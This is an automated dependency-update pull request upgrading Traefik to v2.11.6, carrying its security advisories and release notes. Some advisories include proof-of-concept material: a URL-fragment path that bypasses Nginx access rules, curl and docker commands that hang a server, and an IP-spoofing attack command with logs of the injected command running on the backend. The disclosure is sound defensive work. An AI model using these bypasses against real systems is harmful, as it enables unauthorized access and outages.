fix(deps): update module github.com/traefik/traefik/v2 to v2.11.6 [security] - autoclosed

[renovate]

This PR contains the following updates:

Package	Change	Age	Adoption	Passing	Confidence
github.com/traefik/traefik/v2	v2.6.6 -> v2.11.6

GitHub Vulnerability Alerts

CVE-2022-39271

Impact

There is a potential vulnerability in Traefik managing HTTP/2 connections.
A closing HTTP/2 server connection could hang forever because of a subsequent fatal error. This failure mode could be exploited to cause a denial of service.

Patches

Traefik v2.8.x: https://github.com/traefik/traefik/releases/tag/v2.8.8
Traefik v2.9.x: https://github.com/traefik/traefik/releases/tag/v2.9.0-rc5

Workarounds

No workaround.

For more information

If you have any questions or comments about this advisory, please open an issue.

CVE-2022-46153

Impact

There is a potential vulnerability in Traefik managing the TLS connections.

A router configured with a not well-formatted TLSOption is exposed with an empty TLSOption.

For instance, a route secured using an mTLS connection set with a wrong CA file is exposed without verifying the client certificates.

Patches

https://github.com/traefik/traefik/releases/tag/v2.9.6

Workarounds

Check the logs to detect the following error messages and fix your TLS options:

• Empty CA:

{"level":"error","msg":"invalid clientAuthType: RequireAndVerifyClientCert, CAFiles is required","routerName":"Router0@​file"}

• Bad CA content (or bad path):

{"level":"error","msg":"invalid certificate(s) content","routerName":"Router0@​file"}

• Unknown Client Auth Type:

{"level":"error","msg":"unknown client auth type \"FooClientAuthType\"","routerName":"Router0@​file"}

• Invalid cipherSuites

{"level":"error","msg":"invalid CipherSuite: foobar","routerName":"Router0@​file"}

• Invalid curvePreferences

{"level":"error","msg":"invalid CurveID in curvePreferences: foobar","routerName":"Router0@​file"}

For more information

If you have any questions or comments about this advisory, please open an issue.

CVE-2022-23469

Impact

There is a potential vulnerability in Traefik displaying the Authorization header in its debug logs.

Traefik uses oxy to provide the following features:

• Round Robin: https://doc.traefik.io/traefik/routing/services/#weighted-round-robin-service
• Buffering: https://doc.traefik.io/traefik/middlewares/http/buffering/
• Circuit Breaker: https://doc.traefik.io/traefik/middlewares/http/circuitbreaker/
• In-Flight Requests: https://doc.traefik.io/traefik/middlewares/http/inflightreq/

In such cases, if the log level is set to DEBUG, the credentials provided using the Authorization header are displayed in the debug logs:

level=debug msg="vulcand/oxy/roundrobin/rr: completed ServeHttp on request" Request="{\\"Method\\":\\"POST\\",\\"URL\\":{\\"Scheme\\":\\"\\",\\"Opaque\\":\\"\\",\\"User\\":null,\\"Host\\":\\"\\",\\"Path\\":\\"/<redacted>/<redacted>\\",\\"RawPath\\":\\"\\",\\"ForceQuery\\":false,\\"RawQuery\\":\\"\\",\\"Fragment\\":\\"\\",\\"RawFragment\\":\\"\\"},\\"Proto\\":\\"HTTP/2.0\\",\\"ProtoMajor\\":2,\\"ProtoMinor\\":0,\\"Header\\":{\\"Authorization\\":[\\"Bearer <token value was here>\\"],\\"Content-Type\\":[\\"application/grpc\\"],\\"Grpc-Accept-Encoding\\":[\\"gzip\\"],\\"Grpc-Timeout\\":[\\"29999886u\\"],\\"Te\\":[\\"trailers\\"],\\"User-Agent\\":[\\"<redacted>\\"],<remainder of log message removed>

Patches

https://github.com/traefik/traefik/pull/9574
https://github.com/traefik/traefik/releases/tag/v2.9.6

Workarounds

Set the log level to INFO, WARN, or ERROR.

For more information

If you have any questions or comments about this advisory, please open an issue.

CVE-2023-29013

Impact

There is a vulnerability in Go when parsing the HTTP headers, which impacts Traefik.
HTTP header parsing could allocate substantially more memory than required to hold the parsed headers. This behavior could be exploited to cause a denial of service.

References

• CVE-2023-24534

Patches

• https://github.com/traefik/traefik/releases/tag/v2.9.10
• https://github.com/traefik/traefik/releases/tag/v2.10.0-rc2

Workarounds

No workaround.

For more information

If you have any questions or comments about this advisory, please open an issue.

CVE-2023-47106

Summary

When a request is sent to Traefik with a URL fragment, Traefik automatically URL encodes and forwards the fragment to the backend server. This violates the RFC because in the origin-form the URL should only contain the absolute path and the query.

When this is combined with another frontend proxy like Nginx, it can be used to bypass frontend proxy URI-based access control
restrictions.

Details

For example, we have this Nginx configuration:

location /admin {
     deny all;
     return 403;
}

This can be bypassed when the attacker is requesting to /#/../admin

This won’t be vulnerable if the backend server follows the RFC and ignores any characters after the fragment.

However, if Nginx is chained with another reverse proxy which automatically URL encode the character # (Traefik) the URL will become

/%23/../admin

And allow the attacker to completely bypass the Access Restriction from the Nginx Front-End proxy.

Here is a diagram to summarize the attack:

PoC

This is the POC docker I've set up. It contains Nginx, Traefik proxies and a backend server running PHP.

https://drive.google.com/file/d/1vLnA0g7N7ZKhLNmHmuJ4JJjV_J2akNMt/view?usp=sharing

Impact

This allows the attacker to completely bypass the Access Restriction from Front-End proxy.

CVE-2023-47124

Impact

There is a potential vulnerability in Traefik managing the ACME HTTP challenge.

When Traefik is configured to use the HTTPChallenge to generate and renew the Let's Encrypt TLS certificates, the delay authorized to solve the challenge (50 seconds) can be exploited by attackers (slowloris attack).

Patches

• https://github.com/traefik/traefik/releases/tag/v2.10.6
• https://github.com/traefik/traefik/releases/tag/v3.0.0-beta5

Workarounds

Replace the HTTPChallenge with the TLSChallenge or the DNSChallenge.

For more information

If you have any questions or comments about this advisory, please open an issue.

CVE-2023-47633

Summary

The traefik docker container uses 100% CPU when it serves as its own backend, which is an automatically generated route resulting from the Docker integration in the default configuration.

Details

While attempting to set up Traefik to handle traffic for Docker containers, I observed in the webUI a rule with the following information:

Host(traefik-service) | webwebsecure | traefik-service@docker | traefik-service

I assumed that this is something internal; however, I wondered why it would have a host rule on the web entrypoint configured.

So I have send a request with that hostname with curl -v --resolve "traefik-service:80:xxx.xxx.xxx.xxx" http://traefik-service. That made my whole server unresponsive.

I assume the name comes from a docker container with that name, traefik itself:

localhost ~ # docker ps
CONTAINER ID   IMAGE                                                   COMMAND                  CREATED             STATUS         PORTS                                                                                                NAMES
d1414e74aec7   traefik:v2.10                                           "/entrypoint.sh trae…"   4 minutes ago       Up 4 minutes   0.0.0.0:80->80/tcp, :::80->80/tcp, 0.0.0.0:443->443/tcp, :::443->443/tcp, 127.0.0.1:8080->8080/tcp   traefik.service

PoC

1. Start traefik with docker run --rm -v /var/run/docker.sock:/var/run/docker.sock -p 80:80 --name foo -p 8080:8080 traefik:v2.10 --api.insecure=true --providers.docker

2. curl -v --resolve "foo:80:127.0.0.1" http://foo

looks like this creates an endless loop of request.

Knowing the name of the docker container seems to be enough to trigger this, if the docker backend is used.

Impact

Server is unreachable and uses 100% CPU

CVE-2024-28869

There is a potential vulnerability in Traefik managing requests with Content-length and no body .

Sending a GET request to any Traefik endpoint with the Content-length request header results in an indefinite hang with the default configuration. This vulnerability can be exploited by attackers to induce a denial of service.

Patches

• https://github.com/traefik/traefik/releases/tag/v2.11.2
• https://github.com/traefik/traefik/releases/tag/v3.0.0-rc5

Workarounds

For affected versions, this vulnerability can be mitigated by configuring the readTimeout option.

For more information

If you have any questions or comments about this advisory, please open an issue.

GHSA-7f4j-64p6-5h5v

There is a potential vulnerability in Traefik managing HTTP/2 connections.

More details in the CVE-2023-45288.

Patches

• https://github.com/traefik/traefik/releases/tag/v2.11.2
• https://github.com/traefik/traefik/releases/tag/v3.0.0-rc5

Workarounds

No workaround

For more information

If you have any questions or comments about this advisory, please open an issue.

GHSA-f7cq-5v43-8pwp

Impact

There is a vulnerability in GO managing malformed DNS message, which impacts Traefik.
This vulnerability could be exploited to cause a denial of service.

References

• CVE-2024-24788

Patches

• https://github.com/traefik/traefik/releases/tag/v2.11.3
• https://github.com/traefik/traefik/releases/tag/v3.0.1

Workarounds

No workaround.

For more information

If you have any questions or comments about this advisory, please open an issue.

GHSA-7jmw-8259-q9jx

Impact

There is a vulnerability in Go managing various Is methods (IsPrivate, IsLoopback, etc) for IPv4-mapped IPv6 addresses.

They didn't work as expected returning false for addresses which would return true in their traditional IPv4 forms.

References

• CVE-2024-24790

Patches

• https://github.com/traefik/traefik/releases/tag/v2.11.4
• https://github.com/traefik/traefik/releases/tag/v3.0.2

Workarounds

No workaround.

For more information

If you have any questions or comments about this advisory, please open an issue.

GHSA-rvj4-q8q5-8grf

Impact

There is a vulnerability in Azure Identity Libraries and Microsoft Authentication Library Elevation of Privilege Vulnerability.

References

• CVE-2024-35255

Patches

• https://github.com/traefik/traefik/releases/tag/v2.11.5
• https://github.com/traefik/traefik/releases/tag/v3.0.3

Workarounds

No workaround.

For more information

If you have any questions or comments about this advisory, please open an issue.

CVE-2024-39321

Impact

There is a vulnerability in Traefik that allows bypassing IP allow-lists via HTTP/3 early data requests in QUIC 0-RTT handshakes sent with spoofed IP addresses.

Patches

• https://github.com/traefik/traefik/releases/tag/v2.11.6
• https://github.com/traefik/traefik/releases/tag/v3.0.4
• https://github.com/traefik/traefik/releases/tag/v3.1.0-rc3

Workarounds

No workaround.

For more information

If you have any questions or comments about this advisory, please open an issue.

Original Description

Summary

Bypassing IP allow-lists in traefik via HTTP/3 early data requests in QUIC 0-RTT handshakes sent with spoofed IP addresses.

Details

HTTP/3 supports sending HTTP requests as early data during QUIC 0-RTT handshakes to reduce RTT overhead for connection resumptions. Early data is sent and received before the handshake is completed and the client's IP address is validated.
The initial packet containing the QUIC 0-RTT handshake information and the early data HTTP request are sent as a single UDP datagram. Due to UDP being used by QUIC, the source IP address can be spoofed. When HTTP/3 servers process early data requests, the application layer only sees the unvalidated - possibly spoofed - IP address.

First, attackers have to obtain a session ticket from the HTTP/3 server. For that, attackers have to establish an HTTP/3 connection to the server - using their real IP address - and wait for the server to send a session ticket. Note that attackers do not have to send an actual HTTP request over the established connection. After obtaining the session ticket, the attacker can close the connection. In the second step, attackers need to prepare a UDP datagram containing a QUIC initial packet with a TLS ClientHello and the session ticket, a QUIC 0-RTT packet with early data encrypted with the pre-shared key from the session ticket, and an HTTP/3 request (open request stream, HEADERS frame, optionally DATA frame). This prepared UDP datagram can then be sent to the server with an arbitrarily spoofed source IP address in the IP packet header. When processing the HTTP request, the server trusts the spoofed IP address, which can be used to bypass IP-allow/block-lists.

A prerequisite for this attack to succeed is that HTTP/3 servers have implemented and enabled 0-RTT early data for HTTP/3 requests (and no mitigations are in place). A caveat is that attackers are not able to receive the server's response because the response is sent to the spoofed source IP address, making it a blind attack. Another limitation is that the request has to fit in a single UDP datagram, whose size is limited by the network path's MTU (minus some bytes for headers of encapsulating protocols such as HTTP/3, QUIC, UDP, IPv4/IPv6).

Impact

IP allow-lists can be bypassed. Early data in QUIC 0-RTT handshakes is enabled when HTTP/3 support is enabled.

Mitigation

• Consider responding with HTTP status code 425 Too Early when 0-RTT early data requests match ipAllowList.sourceRange middleware. See RFC 8470 Section 3 for more information.
• Alternatively, delay processing of 0-RTT early data requests until the handshake is completed and the client's IP address is validated when 0-RTT early data requests match ipAllowList.sourceRange middleware.

Additionally, it is recommended to implement RFC 8470 and set the Early-Data: 1 header when forwarding early data requests to backend services. Currently, applications are not able to distinguish between 0-RTT early data requests and regular requests. When applications use the client's IP in X-Forwarded-For headers (e.g. for rate limiting), they are not able to detect potential IP spoofing on the application layer.

Proof of Concept

Traefik is used as a HTTP/3 reverse proxy for a backend application. An IP allow list is configured to only allow access from the IP address 1.3.3.7.

# /etc/traefik/traefik.yml
entryPoints:
  websecure:
    address: ":4439"
    http3: {}
    asDefault: true

providers:
  file:
    filename: /etc/traefik/provider.yml

log:
  level: DEBUG

# /etc/traefik/provider.yml
http:
  routers:
    default:
      rule: "PathPrefix(`/`)"
      tls: {}
      middlewares:
        - ipfilter
      service: backend
  
  middlewares:
    ipfilter:
      ipAllowList:
        sourceRange:
          - "1.3.3.7/32"

  services:
    backend:
      loadBalancer:
        servers:
          - url: "http://127.0.0.1:8000"

By performing the steps described above, attackers are able to bypass the IP allow list and send requests to the backend application. The security impact depends on the application's logic.

Please find attached a proof-of-concept docker-compose setup to demonstrate the vulnerability. It consists of a traefik reverse proxy, a backend application, and an attacker container. The attack script performs following request:

python3 http3_ip_spoofing.py https://127.0.0.1:4439/cmd -X POST -d "cmd=echo%20worked>>/tmp/spoofed" -H "X-Header: test" --spoofed-ip=1.3.3.7

Note: We use a custom python script because, curl does not support QUIC 0-RTT requests and session resumtion yet.

proof-of-concept.zip

Here are logs of a successful exploitation in the attached docker compose setup:

docker compose up

# Traefik startup logs
h3_traefik-1         | 2024-06-29T11:52:58Z INF github.com/traefik/traefik/v3/cmd/traefik/traefik.go:100 > Traefik version 3.0.3 built on 2024-06-18T14:31:20Z version=3.0.3
h3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/cmd/traefik/traefik.go:107 > Static configuration loaded [json] staticConfiguration={"entryPoints":{"websecure":{"address":":4439","asDefault":true,"forwardedHeaders":{},"http":{},"http2":{"maxConcurrentStreams":250},"http3":{},"transport":{"lifeCycle":{"graceTimeOut":"10s"},"respondingTimeouts":{"idleTimeout":"3m0s","readTimeout":"1m0s"}},"udp":{"timeout":"3s"}}},"global":{"checkNewVersion":true},"log":{"format":"common","level":"DEBUG"},"providers":{"file":{"filename":"/etc/traefik/provider.yml","watch":true},"providersThrottleDuration":"2s"},"serversTransport":{"maxIdleConnsPerHost":200},"tcpServersTransport":{"dialKeepAlive":"15s","dialTimeout":"30s"}}
h3_traefik-1         | 2024-06-29T11:52:58Z INF github.com/traefik/traefik/v3/cmd/traefik/traefik.go:605 > 
h3_traefik-1         | Stats collection is disabled.
h3_traefik-1         | Help us improve Traefik by turning this feature on :)
h3_traefik-1         | More details on: https://doc.traefik.io/traefik/contributing/data-collection/
h3_traefik-1         | 
h3_traefik-1         | 2024-06-29T11:52:58Z INF github.com/traefik/traefik/v3/pkg/server/configurationwatcher.go:73 > Starting provider aggregator aggregator.ProviderAggregator
h3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/server/server_entrypoint_tcp.go:220 > Starting TCP Server entryPointName=websecure
h3_traefik-1         | 2024-06-29T11:52:58Z DBG log/log.go:245 > 2024/06/29 11:52:58 sys_conn.go:36: failed to sufficiently increase receive buffer size (was: 208 kiB, wanted: 2048 kiB, got: 416 kiB). See https://github.com/quic-go/quic-go/wiki/UDP-Buffer-Sizes for details.
h3_traefik-1         | 2024-06-29T11:52:58Z INF github.com/traefik/traefik/v3/pkg/provider/aggregator/aggregator.go:202 > Starting provider *file.Provider
h3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/provider/aggregator/aggregator.go:203 > *file.Provider provider configuration config={"filename":"/etc/traefik/provider.yml","watch":true}
h3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/provider/file/file.go:122 > add watcher on: /etc/traefik
h3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/provider/file/file.go:122 > add watcher on: /etc/traefik/provider.yml
h3_traefik-1         | 2024-06-29T11:52:58Z INF github.com/traefik/traefik/v3/pkg/provider/aggregator/aggregator.go:202 > Starting provider *traefik.Provider
h3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/provider/aggregator/aggregator.go:203 > *traefik.Provider provider configuration config={}
h3_traefik-1         | 2024-06-29T11:52:58Z INF github.com/traefik/traefik/v3/pkg/provider/aggregator/aggregator.go:202 > Starting provider *acme.ChallengeTLSALPN
h3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/provider/aggregator/aggregator.go:203 > *acme.ChallengeTLSALPN provider configuration config={}
h3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/server/configurationwatcher.go:227 > Configuration received config={"http":{"middlewares":{"ipfilter":{"ipAllowList":{"sourceRange":["1.3.3.7/32"]}}},"routers":{"default":{"middlewares":["ipfilter"],"rule":"PathPrefix(`/`)","service":"backend","tls":{}}},"services":{"backend":{"loadBalancer":{"passHostHeader":true,"responseForwarding":{"flushInterval":"100ms"},"servers":[{"url":"http://127.0.0.1:8000"}]}}}},"tcp":{},"tls":{},"udp":{}} providerName=file
h3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/server/configurationwatcher.go:227 > Configuration received config={"http":{"serversTransports":{"default":{"maxIdleConnsPerHost":200}},"services":{"noop":{}}},"tcp":{"serversTransports":{"default":{"dialKeepAlive":"15s","dialTimeout":"30s"}}},"tls":{},"udp":{}} providerName=internal
h3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/server/aggregator.go:51 > No entryPoint defined for this router, using the default one(s) instead entryPointName=["websecure"] routerName=default
h3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/tls/tlsmanager.go:321 > No default certificate, fallback to the internal generated certificate tlsStoreName=default
h3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/server/service/service.go:259 > Creating load-balancer entryPointName=websecure routerName=default@file serviceName=backend@file
h3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/server/service/service.go:301 > Creating server entryPointName=websecure routerName=default@file serverName=754e0da3b063885a serviceName=backend@file target=http://127.0.0.1:8000
h3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/middlewares/ipallowlist/ip_allowlist.go:33 > Creating middleware entryPointName=websecure middlewareName=ipfilter@file middlewareType=IPAllowLister routerName=default@file
h3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/middlewares/ipallowlist/ip_allowlist.go:57 > Setting up IPAllowLister with sourceRange: [1.3.3.7/32] entryPointName=websecure middlewareName=ipfilter@file middlewareType=IPAllowLister routerName=default@file
h3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/middlewares/observability/middleware.go:33 > Adding tracing to middleware entryPointName=websecure middlewareName=ipfilter@file routerName=default@file
h3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/middlewares/recovery/recovery.go:22 > Creating middleware entryPointName=websecure middlewareName=traefik-internal-recovery middlewareType=Recover

# Attack script establishes an HTTP/3 connection to traefik to obtain a session ticket
attack-ipspoofing-1  | INFO:client:Initially connecting to server to get a session ticket
attack-ipspoofing-1  | INFO:quic:[e29b2e2fd9a76162] ALPN negotiated protocol h3
attack-ipspoofing-1  | INFO:quic:[e29b2e2fd9a76162] Connection close sent (code 0x0, reason )
attack-ipspoofing-1  | INFO:client:Initial connection done

# Traefik accepts the HTTP/3 connection and issues as session ticket 
h3_traefik-1         | 2024-06-29T11:53:03Z DBG github.com/traefik/traefik/v3/pkg/tls/tlsmanager.go:228 > Serving default certificate for request: ""

# Attack script sends a 0-RTT early data request in a UDP datagram with a spoofed source IP
attack-ipspoofing-1  | INFO:client:Building 0-RTT QUIC packet
attack-ipspoofing-1  | INFO:client:Setting up iptables rule for source IP spoofing
attack-ipspoofing-1  | INFO:client:Sending 0-RTT packet

# Traefik accepts and forwards the request to the backend service, bypassing the IP allow list
h3_traefik-1         | 2024-06-29T11:53:05Z DBG github.com/traefik/traefik/v3/pkg/middlewares/ipallowlist/ip_allowlist.go:85 > Accepting IP 1.3.3.7 middlewareName=ipfilter@file middlewareType=IPAllowLister
h3_traefik-1         | 2024-06-29T11:53:05Z DBG github.com/traefik/traefik/v3/pkg/server/service/loadbalancer/wrr/wrr.go:196 > Service selected by WRR: 754e0da3b063885a

# Backend service receives and processes the request
backend-1            | INFO:root:Request: {"ip": "1.3.3.7", "method": "POST", "path": "/cmd", "data": "cmd=echo%20worked>>/tmp/spoofed", "headers": {"Host": "127.0.0.1:4439", "Content-Length": "31", "Content-Type": "application/x-www-form-urlencoded", "X-Forwarded-For": "1.3.3.7", "X-Forwarded-Host": "127.0.0.1:4439", "X-Forwarded-Port": "4439", "X-Forwarded-Proto": "https", "X-Forwarded-Server": "work", "X-Header": "test", "X-Real-Ip": "1.3.3.7", "Accept-Encoding": "gzip"}}
backend-1            | INFO:root:Executing command: echo worked>>/tmp/spoofed

---

Release Notes

traefik/traefik (github.com/traefik/traefik/v2)

v2.11.6

Compare Source

All Commits

Bug fixes:

• [ecs] Fix ECS config for OIDC + IRSA (#​10814 by mmatur)
• [http3] Disable QUIC 0-RTT (#​10867 by mmatur)
• [middleware,server] Remove interface names from IPv6 (#​10813 by JeroenED)

Documentation:

• [docker,acme] Fix a typo in the ACME docker-compose docs (#​10866 by ciacon)
• Update Advanced Capabilities Callout (#​10846 by tomatokoolaid)
• Update maintainers (#​10834 by emilevauge)
• Fix readme badge for Semaphore CI (#​10830 by mmatur)
• Fix typo in keepAliveMaxTime docs (#​10825 by shochdoerfer)

v2.11.5

Compare Source

All Commits

Bug fixes:

• [acme] Update go-acme/lego to v4.17.4 (#​10803 by ldez)

Documentation:

• Update the supported versions table (#​10798 by nmengin)

v2.11.4

Compare Source

All Commits

Bug fixes:

• [acme] Update go-acme/lego to v4.17.3 (#​10768 by ldez)

Documentation:

• [acme] Fix .com and .org domain examples (#​10635 by rptaylor)
• [middleware] Add a note about the Ratelimit middleware's behavior when the sourceCriterion header is missing (#​10752 by dgutzmann)
• Add user guides link to getting started (#​10785 by norlinhenrik)
• Remove helm default repo warning as repo has been long deprecated (#​10772 by corneliusroemer)

v2.11.3

Compare Source

All Commits

Bug fixes:

• [server] Remove deadlines for non-TLS connections (#​10615 by rtribotte)
• [webui] Display of Content Security Policy values getting out of screen (#​10710 by brandonfl)
• [webui] Fix provider icon size (#​10621 by framebassman)

Documentation:

• [k8s/crd] Fix migration/v2.md (#​10658 by stemar94)
• [k8s/gatewayapi] Fix HTTPRoute use of backendRefs (#​10630 by sakaru)
• [k8s/gatewayapi] Fix HTTPRoute path type (#​10629 by sakaru)
• [k8s] Improve mirroring example on Kubernetes (#​10701 by mloiseleur)
• Consistent entryPoints capitalization in CLI flag usage (#​10650 by jnoordsij)
• Fix unfinished migration sentence for v2.11.2 (#​10633 by kevinpollet)

v2.11.2

Compare Source

All Commits

Bug fixes:

• [server] Revert LingeringTimeout and change default value for ReadTimeout (#​10599 by kevinpollet)
• [server] Set default ReadTimeout value to 60s (#​10602 by rtribotte)

v2.11.1

Compare Source

All Commits

Bug fixes:

• [acme,tls] Enforce handling of ACME-TLS/1 challenges (#​10536 by rtribotte)
• [acme] Update go-acme/lego to v4.16.1 (#​10508 by ldez)
• [acme] Close created file in ACME local store CheckFile func (#​10574 by testwill)
• [docker,http3] Update to quic-go v0.42.0 and docker/cli v24.0.9 (#​10572 by mloiseleur)
• [docker,marathon,rancher,ecs,tls,nomad] Allow to configure TLSStore default generated certificate with labels (#​10439 by kevinpollet)
• [ecs] Adjust ECS network interface detection logic (#​10550 by amaxine)
• [logs,tls] Fix log when default TLSStore and TLSOptions are defined multiple times (#​10499 by rtribotte)
• [middleware] Allow empty replacement with ReplacePathRegex middleware (#​10538 by rtribotte)
• [plugins] Update Yaegi to v0.16.1 (#​10565 by ldez)
• [provider,rules] Don't allow routers higher than internal ones (#​10428 by ldez)
• [rules] Reserve priority range for internal routers (#​10541 by youkoulayley)
• [server,tcp] Introduce Lingering Timeout (#​10569 by rtribotte)
• [tcp] Enforce failure for TCP HostSNI with hostname (#​10540 by youkoulayley)
• [tracing] Bump Elastic APM to v2.4.8 (#​10512 by rtribotte)
• [webui] Fix dashboard exposition through a router (#​10518 by mmatur)
• [webui] Display IPAllowlist middleware configuration in dashboard (#​10459 by youkoulayley)
• [webui] Make text more readable in dark mode (#​10473 by hood)
• [webui] Migrate to Quasar 2.x and Vue.js 3.x (#​10416 by andsarr)
• [webui] Add a horizontal scroll for the mobile view (#​10480 by framebassman)

Documentation:

• [acme] Update gandiv5 env variable in providers table (#​10506 by dominiwe)
• [acme] Fix multiple dns provider documentation (#​10496 by mmatur)
• [docker] Fix paragraph in entrypoints and Docker docs (#​10491 by luigir-it)
• [k8s] Improve middleware example (#​10532 by mloiseleur)
• [metrics] Fix host header mention in prometheus metrics doc (#​10502 by MorphBonehunter)
• [metrics] Fix typo in statsd metrics docs (#​10437 by xpac1985)
• [middleware] Improve excludedIPs example with IPWhiteList and IPAllowList middleware (#​10554 by mloiseleur)
• [nomad] Improve documentation about Nomad ACL minimum rights (#​10482 by Thadir)
• [server] Add specification for TCP TLS routers in documentation (#​10510 by shivanipawar00)
• [tls] Fix default value for peerCertURI option (#​10470 by marcmognol)
• Update releases page (#​10449 by ldez)
• Update releases page (#​10443 by ldez)
• Add youkoulayley to maintainers (#​10517 by emilevauge)
• Add sdelicata to maintainers (#​10515 by emilevauge)

Misc:

• [webui] Modify the Hub Button (#​10583 by mdeliatf)

v2.11.0

Compare Source

All Commits

Enhancements:

• [middleware] Deprecate IPWhiteList middleware in favor of IPAllowList (#​10249 by lbenguigui)
• [redis] Add Redis Sentinel support (#​10245 by youkoulayley)
• [server] Add KeepAliveMaxTime and KeepAliveMaxRequests features to entrypoints (#​10247 by juliens)
• [sticky-session] Hash WRR sticky cookies (#​10243 by youkoulayley)

Bug fixes:

• [acme] Update go-acme/lego to v4.15.0 (#​10392 by ldez)
• [authentication] Fix NTLM and Kerberos (#​10405 by juliens)
• [file] Fix file watcher (#​10420 by juliens)
• [file] Update github.com/fsnotify/fsnotify to v1.7.0 (#​10313 by ldez)
• [http3] Update quic-go to v0.40.1 (#​10296 by ldez)
• [middleware,tcp] Add missing TCP IPAllowList middleware constructor (#​10331 by youkoulayley)
• [nomad] Update the Nomad API dependency to v1.7.2 (#​10327 by jrasell)
• [server] Fix ReadHeaderTimeout for PROXY protocol (#​10320 by juliens)
• [webui] Fixes the Header Button (#​10395 by mdeliatf)
• [webui] Fix URL encode resource's id before calling API endpoints (#​10292 by andsarr)

Documentation:

• [acme] Fix TLS challenge explanation (#​10293 by cavokz)
• [docker] Update wording of compose example (#​10276 by svx)
• [docker,acme] Fix typo (#​10294 by youpsla)
• [ecs] Mention ECS as supported backend (#​10393 by aleyrizvi)
• [k8s/crd] Adjust deprecation notice for Kubernetes CRD provider (#​10317 by rtribotte)
• [middleware] Update the documentation for RateLimit to provide a better example (#​10298 by rmburton)
• [server] Fix the keepAlive options for the CLI examples (#​10398 by immanuelfodor)
• Prepare release v2.11.0-rc2 (#​10384 by rtribotte)
• Improve Concepts documentation page (#​10315 by oliver-dvorski)
• Prepare release v2.11.0-rc1 (#​10326 by mmatur)
• Fix description for anonymous usage statistics references (#​10287 by ariyonaty)
• Documentation enhancements (#​10261 by svx)

v2.10.7

Compare Source

All Commits

Bug fixes:

• [logs] Fixed datadog logs json format issue (#​10233 by sssash18)

v2.10.6

Compare Source

All Commits

Bug fixes:

• [acme] Remove backoff for http challenge (#​10224 by youkoulayley)
• [consul,consulcatalog] Update github.com/hashicorp/consul/api (#​10220 by kevinpollet)
• [http3] Update quic-go to v0.39.1 (#​10171 by tomMoulard)
• [middleware] Fix stripPrefix middleware is not applied to retried attempts (#​10255 by niki-timofe)
• [provider] Refuse recursive requests (#​10242 by rtribotte)
• [server] Deny request with fragment in URL path (#​10229 by lbenguigui)
• [tracing] Remove deprecated code usage for datadog tracer (#​10196 by mmatur)

Documentation:

• [governance] Update the review process and maintainers team documentation (#​10230 by geraldcroes)
• [governance] Guidelines Update (#​10197 by geraldcroes)
• [metrics] Add a mention for the host header in metrics headers labels doc (#​10172 by rtribotte)
• [middleware] Rephrase BasicAuth and DigestAuth docs (#​10226 by sssash18)
• [middleware] Improve ErrorPages examples (#​10209 by arendhummeling)
• Add @​lbenguigui to maintainers (#​10222 by kevinpollet)

v2.10.5

Compare Source

All Commits

Bug fixes:

• [accesslogs] Move origin fields capture to service level (#​10126 by rtribotte)
• [accesslogs] Fix preflight response status in access logs (#​10142 by rtribotte)
• [acme] Update go-acme/lego to v4.14.0 (#​10087 by ldez)
• [acme] Update go-acme/lego to v4.13.3 (#​10077 by ldez)
• [http3] Update quic-go to v0.37.5 (#​10083 by ldez)
• [http3] Update quic-go to v0.39.0 (#​10137 by ldez)
• [http3] Update quic-go to v0.37.6 (#​10085 by ldez)
• [http3] Update quic-go to v0.38.0 (#​10086 by ldez)
• [http3] Update quic-go to v0.38.1 (#​10090 by ldez)
• [kv] Ignore ErrKeyNotFound error for the KV provider (#​10082 by sunyakun)
• [middleware,authentication] Adjust forward auth to avoid connection leak (#​10096 by wdhongtw)
• [middleware,server] Improve CNAME flattening to avoid unnecessary error logging (#​10128 by niallnsec)
• [middleware] Allow X-Forwarded-For delete operation (#​10132 by rtribotte)
• [server] Update x/net and grpc/grpc-go (#​10161 by rtribotte)
• [webui] Add missing accessControlAllowOriginListRegex to middleware view (#​10157 by DBendit)
• Fix false positive in url anonymization (#​10138 by jspdown)

Documentation:

• [acme] Change Arvancloud URL (#​10115 by sajjadjafaribojd)
• [acme] Correct minor typo in crd-acme docs (#​10067 by ayyron-lmao)
• [healthcheck] Remove healthcheck interval configuration warning (#​10068 by rtribotte)
• [kv,redis] Docs describe the missing db parameter in redis provider (#​10052 by tokers)
• [middleware] Doc fix accessControlAllowHeaders examples (#​10121 by ebuildy)
• Updates business callout in the documentation (#​10122 by tomatokoolaid)

v2.10.4

Compare Source

All Commits

Bug fixes:

• [acme] Update go-acme/lego to v4.13.2 (#​10036 by ldez)
• [acme] Update go-acme/lego to v4.13.0 (#​10029 by ldez)
• [k8s/ingress,k8s] fix: avoid panic on resource backends (#​10023 by ldez)
• [middleware,tracing,plugins] fix: traceability of the middleware plugins (#​10028 by ldez)

Documentation:

• Update maintainers guidelines (#​9981 by geraldcroes)
• Update release documentation (#​9975 by rtribotte)

Misc:

• [webui] Updates the Hub tooltip content using a web component and adds an option to disable Hub button (#​10008 by mdeliatf)

v2.10.3

Compare Source

All Commits

Bug fixes:

• [acme] Update go-acme/lego to v4.12.2 (#​9935 by ldez)

v2.10.2

Compare Source

All Commits

Bug fixes:

• [acme] Update go-acme/lego to v4.12.1 (#​9935 by ldez)
